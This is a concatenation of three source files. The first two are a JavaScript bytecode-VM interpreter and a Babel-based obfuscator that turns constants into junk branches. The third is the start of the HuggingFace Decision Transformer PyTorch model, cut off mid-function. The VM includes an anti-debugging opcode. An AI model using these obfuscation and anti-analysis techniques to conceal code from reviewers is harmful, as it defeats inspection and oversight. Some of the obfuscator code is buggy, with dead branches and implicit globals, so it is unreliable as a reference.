a1 = duei.pop(cbbb)
a2 = duei.pop(a1)
a1 = a2 <= a1;
a5 = duei.push(a1)
break
case 37:
a1 = duei.pop(a4)
a2 = duei.pop(a1)
a1 = a2 >= a1;
a2 = duei.push(a1)
break
case 38:
a1 = duei.pop(a3)
a2 = duei.pop(a3)
a1 = a2 > a1;
a2 = duei.push(a1)
break
case 39:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 == a1;
a4 = duei.push(a1)
break
case 48:
(function (){
a1 = shuz[start++] * 2
a3 = []
a4 = []
for (a2=0; a2< a1;a2++){
if (a2 < a1/2){
a3.splice(0,0,duei.pop())
}else{
a4.splice(0,0,duei.pop())
}
}
a1 = duei.pop(a2)
for (a2=0; a2 < a3.length; a2++){
if (a4[a2] == a1){
start += a3[a2]
break
}
else if (a4[a2] == null){
start += a3[a2]
break
}else {
a9 = 10;
}
}
})()
break
case 53:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 === a1;
a3 = duei.push(a1)
break
case 54:
a1 = duei.pop(a5)
a2 = duei.pop(a6)
a1 = a2 !== a1;
a1 = duei.push(a1)
break
case 550:
a1 = duei.pop()
a2 = duei.pop()
a1 = a2 != a1;
duei.push(a1)
break
case 551:
a1 = duei.pop(a3)
a2 = duei.pop(a1)
a1 = a2 in a1;
a1 = duei.push(a1)
break
case 22:
a1 = shuz[start++]
a2 = duei.pop(a3)
a3 = duei.pop(a1)
a2[constantPool[a1]] = a3
break
case 19:
a1 = duei.pop(a4)
a2 = duei.pop(a5)
a1 = a2 - a1;
a6 = duei.push(a1)
break
case 291:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 - a1;
a1 = duei.push(a1)
break
case 20:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 + a1;
a1 = duei.push(a1)
break
case 24:
a1 = duei.pop(a3)
a2 = duei.pop(a1)
a1 = a2 < a1;
a1 = duei.push(a1)
break
case 240:
a1 = duei.pop(a5)
a2 = duei.pop(a9)
a1 = a2 < a1;
a6 = duei.push(a1)
break
case 27:
a1 = duei.pop(a5)
a2 = duei.pop(a6)
a1 = a2 * a1;
a7 = duei.push(a1)
break
case 28:
a1 = duei.pop(a3)
a2 = duei.pop(a4)
a1 = a2 % a1;
a5 = duei.push(a1)
break
case 29:
a1 = duei.pop(a3)
a2 = duei.pop(a4)
a1 = a2 ^ a1;
a5 = duei.push(a1)
break
case 30:
a1 = duei.pop(a2)
a2 = duei.pop(a1)
a1 = a2 / a1;
a3 = duei.push(a1)
break
case 194:
(function (){
debugger;
})()
break
case 25:
a1 = duei.pop(a6)
a2 = shuz[start++]
if (!a1) {
start += a2;
}else {
a9 = 10;
}
;break
case 31:
a1 = duei.pop(a3)
a2 = duei.pop(a2)
a1 = a2 << a1;
a1 = duei.push(a1)
break
case 32:
a1 = duei.pop(a6)
a2 = duei.pop(a7)
a1 = a2 | a1;
a8 = duei.push(a1)
break
case 26:
a1 = duei.pop(a9)
// a2 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] += 1
break
case 190:
a1 = shuz[start++]
start += a1
break
case 192:
a1 = duei.pop(a2)
a3 = shuz[start++]
if (a1) {
start += a3
}else {
a9 = 9
}
break
case 33:
a1 = duei.pop(a3)
a2 = duei.pop(a4)
a1 = a2 >> a1;
a5 = duei.push(a1)
break
case 34:
a1 = duei.pop(a6 )
a2 = duei.pop(a1)
a1 = a2 >>> a1;
a2 = duei.push(a1)
break
case 52:
a1 = duei.pop(a3 )
// a2 = duei.pop()
a3 = shuz[start++]
a1[ constantPool[a3]] -= 1
break
case 104:
a1 = duei.push({})
break
case 105:
a2 = duei.push([])
break
case 57:
(function (){
i = []
a3 = shuz[start++]
a2 = duei.pop(a2)
for (a1 in a2){
i.push(a1)
}
cbbb['for_in_xh_cbb_list'+a3] = i
})()
break
case 51:
a1 = duei.pop(a3)
a2 = shuz[start++]
if (!a1) {
start += a2;
a4 = duei.push(a1)
}else {
a9 = 10;
}
;break
case 252:
a1 = duei.pop(a5)
a2 = shuz[start++]
if (a1) {
start += a2;
a7 = duei.push(a1)
}else {
a9 = 10;
}
;break
case 195:
a2 = shuz[start++]
a3 = shuz[start++]
a4 = shuz[start++]
try{
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
start = a2+start;
if (a6 == "-90_cbb"){
return a6
}
}catch(e){
a7 = e
start = a2+start;
a6 = cbb_jsvmp(a1, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"args":args,
"argsList":argsList,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}else {
a9 = 10;
}
}finally{
if (a6 == "-90_cbb"){
return a6
}else {
a9 = 10;
}
start = a3+start;
a6 = cbb_jsvmp(a3, start, start, duei, args.length, 1, {
"shuz":shuz,
"cbbb":cbbb,
"allthis":allthis,
"argsList":argsList,
"args":args,
"duei":duei,
"all": all,
"a7":a7
})
if (a6 == "-90_cbb"){
return a6
}else {
a9 = 10;
}
start =start+ a4
}
break
case 35:
a1 = duei.pop(a2)
a2 = duei.pop(a3)
a1 = a2 & a1;
a3 = duei.push(a1)
break
case 8:
a1 = shuz[start++]
a2 = shuz[start++]
a1 = new RegExp( constantPool[a1], constantPool[a2]) ;
a4 = duei.push(a1)
break
case 10:
a1 = shuz[start++]
a2 = duei.push(constantPool[a1])
break
case 11:
a1 = shuz[start++]
a2 = duei.push(a1)
break
case 58:
(function (){
a1 = duei.pop(a2)
throw a1
})()
break
case 40:
a1 = duei.pop(a3)
a2 = duei.pop(a1)
a2.push(a1);
a1 = duei.push(a2)
break
case 1:
a8 = duei.length
for (a1=0; a1< a8; a1++){
a7 = duei.pop(a1)
let g = a7
all[g] = function(){
let g2 = new cshduei()
var huuuu = this
if (offnew == 1){
offnew=0
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
a9.__proto__ = cbbb
cltothis(a9.variablePool,changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
return huuuu
}else{
a9 = {
"variablePool":{},
"arguments": arguments,
"zhili":[]
}
cltothis(a9['variablePool'],changlc[cbbb.variablePool[g]].variablePool)
cltothis(a9,a9['variablePool'], 1)
cltothis(a9['zhili'], changlc[cbbb.variablePool[g]].zhili)
a9.__proto__ = cbbb
a6 = cbb_jsvmp(a9, g2, 0, a9['zhili'],arguments, huuuu)
}
if (g2.length == 0){
return undefined
}else{
let h = g2.pop(a1)
for (;1==1;){
if (g2.length == 0){
break
}else{
a9 = g2.pop(a1)
}
}
return h
}
}
}
break
case 2:
(function (){
a1 = duei.length
for (a2 = 0; a2 < a1; a2++)
a9 = duei.shift(a2),argsList[a2]!=undefined ? cbbb[a9] = argsList[a2]:a3 = argsList[a2];
})()
break
case 90:
a1 = duei.pop(a3)
a2 = duei.pop(a4)
a3 = duei.pop(a5)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 290:
a1 = duei.pop(a5)
a2 = duei.pop(a3)
a3 = duei.pop(a1)
// a3[a2] = a1;
// getproto(a2,a1,a3)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
break
case 44:
a5 = duei.pop(a3)
a1 = duei.push(~a5)
break
case 49:
a5 = duei.pop(a3)
a1 = duei.push(typeof a5)
break
case 50:
a5 = duei.pop(a2)
a2 = duei.push(- a5)
break
case 45:
a1 = duei.pop(a2)
a2 = duei.pop(a3)
a3 = duei.pop(a4)
if (a3.variablePool != undefined){
getproto(a3,a2,a1)
}else{
a3[a2] = a1
}
a1 = duei.push(a3)
break
case 55:
a1 = duei.pop(a3)
a2 = duei.pop(a1)
a3 = delete a2[a1];
a1 = duei.push(a3)
break
case 56:
a5 = duei.pop(a1)
a2 = duei.push(void a5)
break
case 60:
a5 = duei.pop(a3)
a4 = duei.push(!a5)
break
case 197:
j = duei.pop(a1)
j2 = duei.pop(a2)
// j2[j] = a1
// getproto(j2,j,a1)
if (j2.variablePool != undefined){
getproto(j2,j,a7)
}else{
j2[j] = a1
}
break
case 46:
(function () {
cbbb['for_in_xh_cbb_list'] = i
a1 = shuz[start++]
a3 = duei.pop(a5)
args = []
for (a2 = 0; a2 < a1; a2++) {
args.splice(0, 0, duei.pop(a6))
}
offnew = 1
if (a3 == RegExp) {
a4 = new RegExp(args[0], args[1])
} else {
a4 = new a3(...args)
}
offnew = 0
a1 = duei.push(a4)
})()
break
case 150:
(function (){
a1 = shuz[start++]
a3 = duei.pop(a5)
args = []
for (a2=0; a2<a1; a2++ ){
args.splice(0,0,duei.pop(a6))
}
let found = false;
for (let key of Object.getOwnPropertyNames(window)) {
if (typeof window[key] === 'function' && a3 === window[key]) {
a4 = window[key](...args)
found = true;
break;
}
}
if (!found) {
a4 = a3.apply(all, args)
}
a2 = duei.push(a4)
})()
break
case 181:
(function (){
a1 = duei.pop(a2);
a2 = duei.pop(a3);
try{
a1 = a2[a1]
}catch(e){
a1 = window[a1]
}
// if (a2 == window && a1==undefined){
// throw new Error("")
// }
all = a2
a1 = duei.push(a1)
})()
break
case 1810:
a1 = duei.pop(a2);
break
case 1811:
a1 = duei.pop(a2)
a2 = duei.pop(a4)
a1 = a2 instanceof a1;
a7 = duei.push(a1)
break
case 200:
return
default:
return "-90_cbb"
}
}
}
// --- VM bootstrap ---------------------------------------------------------
// Under Node (no `window`) fabricate a window-like object exposing the
// CommonJS globals and inheriting from `global`; in a browser the real
// `window` is used directly.
if (!this.window){var window = {"exports": exports,"require": require,"module":module,"__dirname":__dirname,"__filename":__filename};window.__proto__=global;}
// Interpreter flag for `new` handling (opcode 46): 0 = ordinary call.
offnew = 0
// Seed the top-level scope with the entry function's variable pool and
// instruction stream ("zhili") from the compiled program table `changlc`.
window['variablePool'] = {}
window['zhili'] = []
cltothis(window['variablePool'],changlc.awcbb_yhh_fun0.variablePool)
cltothis(window['zhili'], changlc.awcbb_yhh_fun0.zhili)
// Run the entry bytecode; `cshduei` supplies the instrumented operand stack.
// NOTE(review): `cshduei` and `changlc` are defined elsewhere in the build
// output — confirm they are loaded before this file.
cbb_jsvmp( window, new cshduei(), 0, changlc.awcbb_yhh_fun0.zhili)
|
2833844911/cy_jsvmp | 6,986 | tool/pswitch.js | const parser = require('@babel/parser');
const traverse = require('@babel/traverse').default;
const generator = require("@babel/generator").default;
const tee = require("@babel/types");
const { log } = require('console');
const fs = require("fs")
// Shuffle an array into a random order (Fisher-Yates style selection).
function RandDataArray(data) {
//混乱准备
var dataTemp = [].concat(data);
var dataBuffer = [];
var length = dataTemp.length;
//混乱数据
var randCount = 0;
var position = 0;
do {
var randvalue = (((length - randCount) - 1) + 1);
position = Math.floor(Math.random() * randvalue);
dataBuffer.push(dataTemp[position]);
randCount++;
dataTemp[position] = dataTemp[length - randCount];
} while (randCount < length);
return dataBuffer;
}
// Junk-code templates consumed by hljiamshuz for control-flow obfuscation.
// Each template is parsed with @babel/parser, one if-statement is picked at
// random, and compensating "+= n" assignments are pushed into its branches.
// The conditions below are expected to be TRUE in browsers (the legacy
// document.all quirk makes typeof document.all === "undefined", and
// btoa("1234") === "MTIzNA==") — NOTE(review): confirm target environments.
iftrueData2 = `
if (typeof document.all == "undefined"){
}else{
}
if (typeof document.all == "undefined"){
}else{
}
if (window.btoa("1234") == "MTIzNA=="){
}else {
}
`
// The conditions below are expected to be FALSE in browsers
// (typeof document.all is "undefined", navigator.appName is truthy).
// NOTE(review): the name "iffalseDate2" (Date vs Data) is a typo, kept
// because hljiamshuz references it by this exact name.
iffalseDate2 = `
if (typeof document.all == "object"){
}else{
}
if (!navigator.appName){
}else{
}
`
function randomUnmber(start, end){
let data = Math.ceil(Math.random() * end) + start;
return data;
}
// Obfuscate one numeric constant. `data` is {key: babel Identifier node,
// value: number}; the function may split the value across randomly chosen
// junk if/else blocks whose taken branch adds the difference back at
// runtime, so the observable total is unchanged. Returns
// {data: the (possibly reduced) {key, value}, zx: junk statement nodes}.
// NOTE(review): Math.random() * 10 is always < 98, so the early return
// below always fires and the injection path underneath is dead code —
// this looks like a deliberately disabled feature; confirm before use.
function hljiamshuz(data){
    if (Math.random() * 10 < 98){
        // Unwrap an array value to its first element before returning.
        if (typeof data.value == typeof []){
            data.value = data.value[0]
        }
        return {"data": data, "zx":[]}
    }
    // Build a shuffled plan of 1s (use an always-true template) and -1s
    // (use an always-false template); 1–2 of each.
    let trueFalseList = [];
    let qiant = Math.ceil(Math.random() * 2 );
    let unqiant = Math.ceil(Math.random() * 2 );
    for (let i = 0; i < qiant; i++){
        trueFalseList.push(1)
    }
    for (let i = 0; i < unqiant; i++){
        trueFalseList.push(-1)
    }
    trueFalseList = RandDataArray(trueFalseList);
    let zxshuz = []
    for (let i = 0; i < trueFalseList.length; i++){
        // Re-parse the templates each round so every pushed node is fresh.
        iftrueData = parser.parse(iftrueData2)
        iftrueData = iftrueData.program.body
        iffalseDate = parser.parse(iffalseDate2)
        iffalseDate = iffalseDate.program.body
        if (trueFalseList[i] == 1){
            // True template: the consequent executes at runtime, so it gets
            // the compensating "+= jianqNumber"; the alternate gets a decoy.
            let df = iftrueData[randomUnmber(0, iftrueData.length-1)]
            let jianqNumber = Math.ceil(Math.random() * 2) + 1
            data.value -= jianqNumber
            let y = tee.assignmentExpression("=", data.key, tee.binaryExpression("+",data.key, tee.NumericLiteral(jianqNumber)))
            df.consequent.body.push(y);
            let y2 = tee.assignmentExpression("=", data.key, tee.binaryExpression("+",data.key, tee.NumericLiteral(Math.ceil(Math.random() * 4) + 1)))
            df.alternate.body.push(y2);
            zxshuz.push(df);
        }else if (trueFalseList[i] == -1){
            // False template: the alternate executes at runtime — mirror of
            // the branch above with consequent/alternate swapped.
            let df = iffalseDate[randomUnmber(0, iffalseDate.length-1)]
            let jianqNumber = Math.ceil(Math.random() * 2) + 1
            data.value -= jianqNumber
            let y = tee.assignmentExpression("=", data.key, tee.binaryExpression("+",data.key, tee.NumericLiteral(jianqNumber)))
            df.alternate.body.push(y);
            let y2 = tee.assignmentExpression("=", data.key, tee.binaryExpression("+",data.key, tee.NumericLiteral(Math.ceil(Math.random() * 4) + 1)))
            df.consequent.body.push(y2);
            zxshuz.push(df);
        }
    }
    return {"data": data, "zx":zxshuz};
}
// Build the obfuscated body: wrap a list of statement AST nodes in an
// immediately-invoked function expression, i.e. (function(){ ... })();
// Returns the resulting ExpressionStatement node.
function gitBody(data){
    var wrapperFn = tee.functionExpression(null, [], tee.blockStatement(data));
    var invocation = tee.callExpression(wrapperFn, []);
    return tee.expressionStatement(invocation);
}
// Ordered array: collects statement nodes lifted out of obfuscated
// functions, in execution order (serialized into the output by the
// top-level script).
var shengxu = [];
// Create the variable "dict" with obfuscated initial values; extra code can
// be inserted to run after initialization (comment for createDict below).
// Build the obfuscated wrapper for one function.
// args     : list of numeric-literal values found in the function (each
//            wrapped as a single-element array by the caller).
// body     : statement nodes to append to the global `shengxu` sequence.
// bodyNode : the rewritten function node to embed in the wrapper.
// Returns {e: IIFE ExpressionStatement, e2: map original-value -> oo<i>
// Identifier node} so the caller can replace literals with variable refs.
function createDict(args, body, bodyNode){
    let medata = [];
    // remember where this function's statements start in `shengxu`
    let start = shengxu.length
    let dyb = {}
    let ifel = [];
    let gyhhu = []
    for (let i2 = 0; i2 < body.length; i2++){
        shengxu.push(body[i2])
    }
    for (let i = 0; i < args.length; i++){
        // one obfuscated variable oo<i> per numeric literal
        let data = {
            key : tee.identifier("oo"+ i) ,
            value: args[i]
        }
        let gh = hljiamshuz(data)
        // medata.push(tee.objectProperty(tee.identifier("oo"+i),tee.NumericLiteral(gh['data'].value)))
        gyhhu.push(["oo"+i,tee.NumericLiteral(gh['data'].value) ])
        // NOTE(review): args[i] is an array, so the dict key is its string
        // form (e.g. [3] -> "3"); lookups later use the bare number, which
        // coerces to the same string — works, but fragile.
        dyb[args[i]] = gh['data'].key
        ifel = ifel.concat(gh['zx'])
    }
    // `oost` tracks this function's start offset into `shengxu`
    // NOTE(review): `data2` below is an implicit global (no declaration)
    data2 = {
        key : tee.identifier("oost"),
        value: start
    }
    let gh2 = hljiamshuz(data2)
    // medata.push(tee.objectProperty(tee.identifier("oost"), tee.NumericLiteral(gh2['data'].value)))
    gyhhu.push(["oost",tee.NumericLiteral(gh2['data'].value)])
    dyb["start"] = gh2['data'].key
    let gh = ifel.concat(gh2['zx'])
    // let data = tee.variableDeclaration("var", [tee.variableDeclarator(
    //     tee.identifier("cbb_hx1"), tee.objectExpression(medata)
    // )])
    // let gh = [data].concat(ifel)
    for (let i =0; i < gyhhu.length; i++){
        // prepend `var oo<i> = <obfuscated value>` declarations
        // NOTE(review): `data` here is also an implicit global
        data = tee.variableDeclaration("var", [tee.variableDeclarator(
            tee.identifier(gyhhu[i][0]), gyhhu[i][1]
        )])
        gh = [data].concat(gh)
    }
    gh.push(bodyNode)
    let body2 = gitBody(gh)
    return {"e":body2, "e2":dyb};
}
// pp = createDict([10,22,33], [2,5,8,6])
// let u = generator(pp).code
// console.log(u);
// Babel visitor: rewrites every function that contains a `Cbb(...)` marker
// call. All numeric literals in the enclosing function are replaced with
// obfuscated oo<i> variables (via createDict), the function declaration is
// turned into an assignment wrapped in an IIFE, and the Cbb(...) marker
// itself is removed.
let parseData = {
    CallExpression(path){
        if (path.node.callee.name == "Cbb"){
            // NOTE(review): trueList/falseList (and mg/shuz) are built but
            // never used below — looks like leftovers from an earlier design.
            var trueList = []
            var falseList = []
            for (let i=0; i< path.node.arguments[0].elements.length; i++){
                trueList.push("if ("+ path.node.arguments[0].elements[i].value+ "){}else{};")
            }
            for (let i=0; i< path.node.arguments[1].elements.length; i++){
                falseList.push("if ("+ path.node.arguments[1].elements[i].value+ "){}else{};")
            }
            var funPath = path.findParent((p)=>p.isFunctionDeclaration());
            var mg = [];
            let shuz = []
            var leme = [];
            var leme2 = [];
            // collect numeric literals that belong DIRECTLY to this
            // function (not to nested function declarations)
            funPath.traverse({
                NumericLiteral(path2){
                    let gh = path2.findParent((p)=>p.isFunctionDeclaration());
                    if (funPath == gh){
                        leme.push([path2.node.value, path2])
                        leme2.push([path2.node.value])
                    }
                }
            })
            // `function f(...) {...}` -> `f = function(...) {...}`
            funPath.replaceInline(tee.assignmentExpression("=", tee.identifier(funPath.node.id.name), tee.functionExpression(null,funPath.node.params, funPath.node.body)))
            var hui = createDict(leme2,shuz, funPath.node);
            // swap each literal for its obfuscated oo<i> identifier
            for (let i = 0; i< leme.length; i++){
                leme[i][1].replaceInline( hui["e2"][leme[i][0]])
            }
            funPath.replaceInline(hui["e"])
            funPath.skip()
            path.remove();
        }
    }
}
// Entry point: read the pre-processed source, run the obfuscating visitor,
// then emit the result prefixed with the serialized `shengxu` table and
// the runtime helper `cbbfuntome` that replays statements from it.
let data = fs.readFileSync('./outsrc/out3.js') + ''
let ast = parser.parse(data)
traverse(ast, parseData)
// runtime preamble: the lifted-statement table + its accessor
let wmhans = "var shengxu = "+JSON.stringify(shengxu)+";\n"+
`
function cbbfuntome(a){
    var i = shengxu[a.cbb];
    a.cbb += 1
    return i;
};\n
`
let u =wmhans+ generator(ast,{
    // compact:true
}).code
// NOTE(review): fs.writeFileSync is synchronous and takes no callback —
// the (e)=>{} third argument is passed where `options` belongs; confirm
// this doesn't throw on the Node version in use.
fs.writeFileSync("./outsrc/out2.js", u, (e)=>{})
|
27182812/ChatGLM-LLaMA-chinese-insturct | 43,400 | src/transformers/models/decision_transformer/modeling_decision_transformer.py | # coding=utf-8
# Copyright 2022 The HuggingFace Team The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch DecisionTransformer model."""
import math
import os
from dataclasses import dataclass
from typing import Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from torch import nn
from torch.cuda.amp import autocast
from ...activations import ACT2FN
from ...modeling_outputs import BaseModelOutputWithPastAndCrossAttentions
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import Conv1D, find_pruneable_heads_and_indices, prune_conv1d_layer
from ...utils import (
ModelOutput,
add_start_docstrings,
add_start_docstrings_to_model_forward,
logging,
replace_return_docstrings,
)
from .configuration_decision_transformer import DecisionTransformerConfig
# Module-level logger and doc-building constants used by the decorators below.
logger = logging.get_logger(__name__)
# Reference checkpoint / config names interpolated into generated docstrings.
_CHECKPOINT_FOR_DOC = "edbeeching/decision-transformer-gym-hopper-medium"
_CONFIG_FOR_DOC = "DecisionTransformerConfig"
DECISION_TRANSFORMER_PRETRAINED_MODEL_ARCHIVE_LIST = [
    "edbeeching/decision-transformer-gym-hopper-medium",
    # See all DecisionTransformer models at https://huggingface.co/models?filter=decision_transformer
]
# Copied from transformers.models.gpt2.modeling_gpt2.load_tf_weights_in_gpt2
def load_tf_weights_in_gpt2(model, config, gpt2_checkpoint_path):
    """Load TensorFlow checkpoint weights into a PyTorch GPT-2 model.

    Args:
        model: PyTorch model whose parameters are overwritten in place.
        config: Model configuration (unused here; kept for the standard
            `load_tf_weights` callback signature).
        gpt2_checkpoint_path: Path to the TensorFlow checkpoint.

    Returns:
        The same `model`, with weights loaded.

    Raises:
        AssertionError: If a checkpoint array's shape does not match the
            corresponding PyTorch parameter.
    """
    try:
        import re
        import tensorflow as tf
    except ImportError:
        logger.error(
            "Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
            "https://www.tensorflow.org/install/ for installation instructions."
        )
        raise
    tf_path = os.path.abspath(gpt2_checkpoint_path)
    logger.info(f"Converting TensorFlow checkpoint from {tf_path}")
    # Load weights from TF model
    init_vars = tf.train.list_variables(tf_path)
    names = []
    arrays = []
    for name, shape in init_vars:
        logger.info(f"Loading TF weight {name} with shape {shape}")
        array = tf.train.load_variable(tf_path, name)
        names.append(name)
        arrays.append(array.squeeze())
    for name, array in zip(names, arrays):
        name = name[6:]  # skip "model/"
        name = name.split("/")
        pointer = model
        # Walk the slash-separated TF variable name down the PyTorch module
        # tree, translating TF naming (w/g/b, wpe/wte, layer indices).
        for m_name in name:
            if re.fullmatch(r"[A-Za-z]+\d+", m_name):
                scope_names = re.split(r"(\d+)", m_name)
            else:
                scope_names = [m_name]
            if scope_names[0] == "w" or scope_names[0] == "g":
                pointer = getattr(pointer, "weight")
            elif scope_names[0] == "b":
                pointer = getattr(pointer, "bias")
            elif scope_names[0] == "wpe" or scope_names[0] == "wte":
                pointer = getattr(pointer, scope_names[0])
                pointer = getattr(pointer, "weight")
            else:
                pointer = getattr(pointer, scope_names[0])
            if len(scope_names) >= 2:
                num = int(scope_names[1])
                pointer = pointer[num]
        # Explicit check instead of `assert` inside try/except: assert
        # statements are stripped when Python runs with -O, which would
        # silently skip shape validation. Same exception type and args as
        # the original `e.args += (pointer.shape, array.shape)` path, so
        # callers catching AssertionError are unaffected.
        if pointer.shape != array.shape:
            raise AssertionError(
                f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched",
                pointer.shape,
                array.shape,
            )
        logger.info(f"Initialize PyTorch weight {name}")
        pointer.data = torch.from_numpy(array)
    return model
# Copied from transformers.models.gpt2.modeling_gpt2.GPT2Attention with GPT2->DecisionTransformerGPT2
class DecisionTransformerGPT2Attention(nn.Module):
    """GPT-2 style multi-head attention (self- or cross-attention).

    Holds the fused QKV projection (`c_attn`), the output projection
    (`c_proj`), and a lower-triangular boolean `bias` buffer used as the
    causal mask in self-attention. With `is_cross_attention=True`, queries
    come from `hidden_states` via `q_attn` while keys/values come from
    `encoder_hidden_states` via `c_attn` (which is then 2*embed_dim wide).
    """
    def __init__(self, config, is_cross_attention=False, layer_idx=None):
        super().__init__()
        max_positions = config.max_position_embeddings
        self.register_buffer(
            "bias",
            torch.tril(torch.ones((max_positions, max_positions), dtype=torch.bool)).view(
                1, 1, max_positions, max_positions
            ),
        )
        self.register_buffer("masked_bias", torch.tensor(-1e4))
        self.embed_dim = config.hidden_size
        self.num_heads = config.num_attention_heads
        self.head_dim = self.embed_dim // self.num_heads
        self.split_size = self.embed_dim
        if self.head_dim * self.num_heads != self.embed_dim:
            raise ValueError(
                f"`embed_dim` must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`:"
                f" {self.num_heads})."
            )
        self.scale_attn_weights = config.scale_attn_weights
        self.is_cross_attention = is_cross_attention
        # Layer-wise attention scaling, reordering, and upcasting
        self.scale_attn_by_inverse_layer_idx = config.scale_attn_by_inverse_layer_idx
        self.layer_idx = layer_idx
        self.reorder_and_upcast_attn = config.reorder_and_upcast_attn
        if self.is_cross_attention:
            self.c_attn = Conv1D(2 * self.embed_dim, self.embed_dim)
            self.q_attn = Conv1D(self.embed_dim, self.embed_dim)
        else:
            self.c_attn = Conv1D(3 * self.embed_dim, self.embed_dim)
        self.c_proj = Conv1D(self.embed_dim, self.embed_dim)
        self.attn_dropout = nn.Dropout(config.attn_pdrop)
        self.resid_dropout = nn.Dropout(config.resid_pdrop)
        self.pruned_heads = set()
    def prune_heads(self, heads):
        """Remove the given attention heads in place, shrinking `c_attn`/`c_proj` accordingly."""
        if len(heads) == 0:
            return
        heads, index = find_pruneable_heads_and_indices(heads, self.num_heads, self.head_dim, self.pruned_heads)
        # same column indices repeated for the Q, K and V thirds of c_attn
        index_attn = torch.cat([index, index + self.split_size, index + (2 * self.split_size)])
        # Prune conv1d layers
        self.c_attn = prune_conv1d_layer(self.c_attn, index_attn, dim=1)
        self.c_proj = prune_conv1d_layer(self.c_proj, index, dim=0)
        # Update hyper params
        self.split_size = (self.split_size // self.num_heads) * (self.num_heads - len(heads))
        self.num_heads = self.num_heads - len(heads)
        self.pruned_heads = self.pruned_heads.union(heads)
    def _attn(self, query, key, value, attention_mask=None, head_mask=None):
        """Standard scaled dot-product attention; returns (attn_output, attn_weights)."""
        attn_weights = torch.matmul(query, key.transpose(-1, -2))
        if self.scale_attn_weights:
            attn_weights = attn_weights / torch.full(
                [], value.size(-1) ** 0.5, dtype=attn_weights.dtype, device=attn_weights.device
            )
        # Layer-wise attention scaling
        if self.scale_attn_by_inverse_layer_idx:
            attn_weights = attn_weights / float(self.layer_idx + 1)
        if not self.is_cross_attention:
            # if only "normal" attention layer implements causal mask
            query_length, key_length = query.size(-2), key.size(-2)
            causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length]
            mask_value = torch.finfo(attn_weights.dtype).min
            # Need to be a tensor, otherwise we get error: `RuntimeError: expected scalar type float but found double`.
            # Need to be on the same device, otherwise `RuntimeError: ..., x and y to be on the same device`
            mask_value = torch.full([], mask_value, dtype=attn_weights.dtype).to(attn_weights.device)
            attn_weights = torch.where(causal_mask, attn_weights.to(attn_weights.dtype), mask_value)
        if attention_mask is not None:
            # Apply the attention mask
            attn_weights = attn_weights + attention_mask
        attn_weights = nn.functional.softmax(attn_weights, dim=-1)
        # Downcast (if necessary) back to V's dtype (if in mixed-precision) -- No-Op otherwise
        attn_weights = attn_weights.type(value.dtype)
        attn_weights = self.attn_dropout(attn_weights)
        # Mask heads if we want to
        if head_mask is not None:
            attn_weights = attn_weights * head_mask
        attn_output = torch.matmul(attn_weights, value)
        return attn_output, attn_weights
    def _upcast_and_reordered_attn(self, query, key, value, attention_mask=None, head_mask=None):
        """Like `_attn` but computes scores in float32 via `baddbmm` with the scale folded into alpha (Megatron-LM)."""
        # Use `torch.baddbmm` (a bit more efficient w/ alpha param for scaling -- from Megatron-LM)
        bsz, num_heads, q_seq_len, dk = query.size()
        _, _, k_seq_len, _ = key.size()
        # Preallocate attn_weights for `baddbmm`
        attn_weights = torch.empty(bsz * num_heads, q_seq_len, k_seq_len, dtype=torch.float32, device=query.device)
        # Compute Scale Factor
        scale_factor = 1.0
        if self.scale_attn_weights:
            scale_factor /= float(value.size(-1)) ** 0.5
        if self.scale_attn_by_inverse_layer_idx:
            scale_factor /= float(self.layer_idx + 1)
        # Upcast (turn off autocast) and reorder (Scale K by 1 / root(dk))
        with autocast(enabled=False):
            q, k = query.reshape(-1, q_seq_len, dk), key.transpose(-1, -2).reshape(-1, dk, k_seq_len)
            attn_weights = torch.baddbmm(attn_weights, q.float(), k.float(), beta=0, alpha=scale_factor)
            attn_weights = attn_weights.reshape(bsz, num_heads, q_seq_len, k_seq_len)
        if not self.is_cross_attention:
            # if only "normal" attention layer implements causal mask
            query_length, key_length = query.size(-2), key.size(-2)
            causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length].bool()
            mask_value = torch.finfo(attn_weights.dtype).min
            # Need to be a tensor, otherwise we get error: `RuntimeError: expected scalar type float but found double`.
            # Need to be on the same device, otherwise `RuntimeError: ..., x and y to be on the same device`
            mask_value = torch.tensor(mask_value, dtype=attn_weights.dtype).to(attn_weights.device)
            attn_weights = torch.where(causal_mask, attn_weights, mask_value)
        if attention_mask is not None:
            # Apply the attention mask
            attn_weights = attn_weights + attention_mask
        attn_weights = nn.functional.softmax(attn_weights, dim=-1)
        # Downcast (if necessary) back to V's dtype (if in mixed-precision) -- No-Op if otherwise
        if attn_weights.dtype != torch.float32:
            raise RuntimeError("Error with upcasting, attn_weights does not have dtype torch.float32")
